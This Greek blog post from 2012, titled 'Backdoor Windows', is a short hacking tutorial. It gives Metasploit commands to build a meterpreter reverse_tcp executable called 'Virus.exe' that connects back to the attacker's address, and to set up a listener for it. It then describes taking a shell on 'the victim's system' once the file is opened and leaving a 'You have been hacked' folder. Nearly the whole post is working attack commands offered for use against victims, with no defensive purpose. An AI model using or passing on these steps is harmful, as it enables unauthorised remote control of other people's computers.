Blogger Widgets

Κυριακή 16 Δεκεμβρίου 2012

Backdoor Windows

Open a new console and type:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 x > /root/Desktop/Virus.exe
(In my case is 192.168.1.1 and i choosed the name Virus...You can choose whatever you want)

After the file is created open another terminal and type:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST=192.168.1.1
exploit

When you see Sending stage........ that means that the victim opened your file...and when you see the console saying meterpreter > that means that you are in the victim's system and console is waiting for commands...
For example you want to create a folder type:
shell
cd /
mkdir You have been hacked by GRDriftKing

The folder is created in C:\ with the name You have been hacked by GRDriftKing

Δεν υπάρχουν σχόλια:

Δημοσίευση σχολίου

IP widget
Έχετε συνδεθεί στην σελίδα πριν:

Δευτερόλ.
GRDriftKing